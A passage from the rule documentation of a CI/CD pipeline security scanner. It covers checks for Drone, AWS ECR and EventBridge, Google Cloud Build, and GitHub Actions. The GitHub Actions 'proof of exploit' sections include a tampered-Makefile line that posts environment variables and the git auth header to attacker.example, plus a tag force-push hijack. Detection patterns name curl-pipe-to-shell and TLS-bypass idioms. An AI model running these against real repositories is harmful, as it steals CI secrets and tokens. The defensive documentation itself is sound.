Recommendation. Pin every node: map entry to a static literal that matches your runner-targeting policy. Drone uses node: to route a pipeline to runners with matching labels (e.g. node: { instance: ci-prod-amd64 }). When the map value interpolates ${DRONE_BRANCH} / ${DRONE_PULL_REQUEST_*} / ${DRONE_COMMIT_AUTHOR}, the pusher gets to pick which runner pool runs the pipeline, including a privileged pool reserved for the deploy step. Production runner pools should also carry a label the agent itself enforces (the runner's DRONE_RUNNER_LABELS env var, plus a server-side policy on which repos can target which labels) so the rule is one layer of defense-in-depth.

Known false positives.

  • Some teams use a static prefix plus a CI-controlled tail (node: { pool: build-${DRONE_REPO_NAME} }) to share a runner pool across repos. DRONE_REPO_NAME is set by the server, not the pusher, so it isn't on the tainted list, but if your team has its own conventions for trusted Drone vars, suppress on the specific pipeline name.

Source: DR-011 in the Drone CI provider.

EB-000: EventBridge API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: EB-000 in the AWS provider.

EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.

Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.

Source: EB-001 in the AWS provider.

EB-002: EventBridge rule has a wildcard target ARN HIGH

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. Wildcard target ARNs (e.g. arn:aws:lambda:us-east-1:123456789012:function:*) match every resource that fits the prefix. This is rarely intentional, usually a copy-paste from a more permissive resource ARN, and means the rule fans out to a much larger set of consumers than the author meant.

Recommendation. Replace wildcard target ARNs with specific resource ARNs. EventBridge targets with * route events to any resource that matches the prefix, frequently triggering unintended Lambda invocations or SNS sends.

Source: EB-002 in the AWS provider.

ECR-000: ECR API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: ECR-000 in the AWS provider.

ECR-001: Image scanning on push not enabled HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).

Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.

Source: ECR-001 in the AWS provider.

ECR-002: Image tags are mutable HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently, the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.

Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.

Source: ECR-002 in the AWS provider.

ECR-003: Repository policy allows public access CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. Sometimes intentional (a publicly-distributed base image), but should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.

Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.

Source: ECR-003 in the AWS provider.

ECR-004: No lifecycle policy configured LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available, anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.

Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.

Source: ECR-004 in the AWS provider.

ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property, the same key-policy + audit shape as build outputs in S3 is warranted.

Recommendation. Set encryptionType=KMS with a customer-managed key ARN.

Source: ECR-005 in the AWS provider.

ECR-006: ECR pull-through cache rule uses an untrusted upstream HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. AWS supports pull-through cache for ECR Public, Quay, K8s, GitHub Container Registry, GitLab, and Docker Hub. A rule pointing at registry-1.docker.io without an authenticated credential silently caches whatever the public namespace resolves to.

Recommendation. Scope pull-through cache rules to AWS-trusted registries (ECR Public, Quay.io with authentication, or a vetted private registry). Avoid wildcard or unauthenticated upstreams, a malicious image there gets cached into your account registry on first pull.

Source: ECR-006 in the AWS provider.

ECR-007: Inspector v2 enhanced scanning disabled for ECR MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. ECR-001's basic on-push scan covers OS-level packages, apt / yum / apk lineage. Most production CVE risk is in language ecosystems (npm, pip, gem, mvn) which the basic scanner ignores. Inspector v2 enhanced scanning closes that gap and runs continuously, so a CVE published two weeks after a build still surfaces against the deployed image.

Recommendation. Enable Amazon Inspector v2 for the ECR scan type on this account. Basic ECR scanning on-push only covers OS packages; Inspector v2 enhanced scanning adds language-ecosystem CVEs and runs continuously as new vulnerabilities are published.

Source: ECR-007 in the AWS provider.

GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.

Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-001 in the Cloud Build provider.

GCB-002: Cloud Build uses the default service account HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.

Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.

Source: GCB-002 in the Cloud Build provider.

GCB-003: Secret Manager value referenced in step args HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.

Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args, the resolved plaintext lands in build logs.

Source: GCB-003 in the Cloud Build provider.

GCB-004: dynamicSubstitutions on with user substitutions in step args HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. The _-prefix is Cloud Build's naming convention for user substitutions; they are editable via build trigger UI, gcloud builds submit --substitutions, and the REST API. Built-in substitutions ($PROJECT_ID, $COMMIT_SHA, $BUILD_ID) are derived from the trigger event and are not treated as user-controlled by this rule.

Recommendation. Either disable options.dynamicSubstitutions (it defaults to false) or move user substitutions ($_FOO) out of step args, pass them through env: and reference them inside a shell script the builder runs. Dynamic substitution re-evaluates bash syntax after variable expansion, giving trigger-config editors a script-injection channel.

Source: GCB-004 in the Cloud Build provider.

GCB-005: Build timeout unset or excessive LOW 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.

Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-005 in the Cloud Build provider.

GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms, eval, sh -c "$X", backtick exec, regardless of whether the substitution source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged, the substituted command is literal, only its output is eval'd.

Source: GCB-006 in the Cloud Build provider.

GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.

Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-007 in the Cloud Build provider.

GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The detector matches tool names anywhere in the document, step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.

Recommendation. Add a step that runs a vulnerability scanner, trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.

Source: GCB-008 in the Cloud Build provider.

GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Silent-pass when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.

Recommendation. Add a signing step before images: is resolved, for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.

Source: GCB-009 in the Cloud Build provider.

GCB-010: Remote script piped to shell interpreter HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.

Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository and invoke it from the checkout, removing the network fetch removes the attacker-controllable content entirely.

Source: GCB-010 in the Cloud Build provider.

GCB-011: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.

Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-011 in the Cloud Build provider.

GCB-012: Credential-shaped literal in pipeline body CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML. AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE/CHANGEME are already filtered upstream so fixtures and docs don't false-match.

Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.

Source: GCB-012 in the Cloud Build provider.

GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile/registry integrity model, the build is technically reproducible but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.

Source: GCB-013 in the Cloud Build provider.

GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case- insensitive) trips this rule. GCS_ONLY / LEGACY pass. They persist logs, just to a different destination.

Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-014 in the Cloud Build provider.

GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.

Recommendation. Add an SBOM generation step, syft <image> -o cyclonedx-json, trivy image --format cyclonedx, and publish the resulting document alongside the image (typically via a cosign attestation so the SBOM travels with the artifact).

Source: GCB-015 in the Cloud Build provider.

GCB-016: Step dir field contains parent-directory escape (..) MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.

Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.

Source: GCB-016 in the Cloud Build provider.

GCB-017: Image-producing build does not request SLSA provenance MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance. Cloud Build's VERIFIED verify option is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.

Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.

Source: GCB-017 in the Cloud Build provider.

GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.

Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.

Known false positives.

  • Builds that use both forms during a migration trip the rule on the legacy block. That's intentional, finishing the migration is the fix.

Source: GCB-018 in the Cloud Build provider.

GCB-019: Shell entrypoint inlines a user substitution into args HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args: Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried, straight command injection through trigger configuration.

Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.

Source: GCB-019 in the Cloud Build provider.

GCB-020: serviceAccount points at the default Cloud Build service account HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.

Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.

Known false positives.

  • Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.

Source: GCB-020 in the Cloud Build provider.

GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and traffic interoperation with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.

Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief .pipelinecheckignore rationale rather than disabling at the catalog level.

Source: GCB-021 in the Cloud Build provider.

GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.

Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That paper-overs typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and combined with dynamicSubstitutions: true (GCB-004) it widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief .pipelinecheckignore rationale and an expires: date so the waiver doesn't outlive the migration.

Source: GCB-022 in the Cloud Build provider.

GCB-023: Step references a user substitution not declared in substitutions: MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.

Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.

Source: GCB-023 in the Cloud Build provider.

GCB-024: Build pushes Docker images but top-level images: is empty LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. When the build has at least one such step but the top-level images: field is missing or empty, fires. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected. Those are different builder images entirely.

Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.

Known false positives.

  • Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in images:) would trip this rule on the cache push. Suppress with --ignore-file when this matches.

Source: GCB-024 in the Cloud Build provider.

GCB-025: Build has no tags for audit / discoverability LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated. Cloud Build expands them at submission time.

Recommendation. Add a top-level tags: array to every cloudbuild.yaml, at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries so post-incident triage of which build emitted this becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds discoverable only by build-id; the id is a UUID with no signal.

Known false positives.

  • Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with --ignore-file if that matches.

Source: GCB-025 in the Cloud Build provider.

GCB-026: Step waitFor: references an unknown step id MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists, typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent-skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.

Recommendation. Verify every ID listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build, Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.

Source: GCB-026 in the Cloud Build provider.

GHA-001: Action not pinned to commit SHA HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository, a third-party action compromise will propagate into the pipeline on the next run.

Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind @v1 / @v45 shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA.
  • reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.

Proof of exploit.

Tag-pinned reference (vulnerable):

  • uses: tj-actions/changed-files@v45

Attack: the upstream maintainer (or anyone who compromises

the upstream repo) force-moves the v45 tag to a malicious

commit:

git tag -f v45

git push --force origin v45

Every consumer's next workflow run pulls the new code

automatically, executing the attacker's payload with the

job's secrets and GITHUB_TOKEN in scope.

Safe: pin to a 40-char commit SHA (immutable):

Source: GHA-001 in the GitHub Actions provider.

GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.

Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a pull_request_target workflow with the PR head checked out runs in the base repo's privileged context.
  • Trail of Bits Codecov-style supply chain via pwn requests (2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.

Proof of exploit.

Vulnerable: pull_request_target + checkout PR head =

attacker code runs with secrets + write-scope token.

name: build-pr on: pull_request_target: branches: [main] jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@ with: ref: ${{ github.event.pull_request.head.sha }} - run: make test # runs PR-head Makefile

Attack: any external contributor opens a fork PR with a

tampered Makefile:

test:

# curl -X POST https://attacker.example/exfil \ # -d "$(env)" \

-d "$(git config --get-all http.https://github.com/.extraheader)"

CI runs the malicious target with the base repo's secrets

(every ${{ secrets.* }} the workflow has access to) and a

write-scope GITHUB_TOKEN. The PR doesn't even need to be

merged or reviewed — the privileged execution happens at

PR-open time.

Safe: split the workflow. The labeler runs with secrets

but never checks out PR head; the builder runs in

pull_request context with no secrets:

name: triage # privileged half on: { pull_request_target: { types: [opened, synchronize] } } jobs: label: runs-on: ubuntu-latest steps: - run: gh pr edit ${{ github.event.number }} --add-label triage env: GH_TOKEN: ${{ github.token }}


name: build # unprivileged half on: { pull_request: {} } jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@ # checks out PR head - run: make test # no secrets in scope

Source: GHA-002 in the GitHub Actions provider.

GHA-003: Script injection via untrusted context HIGH 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.

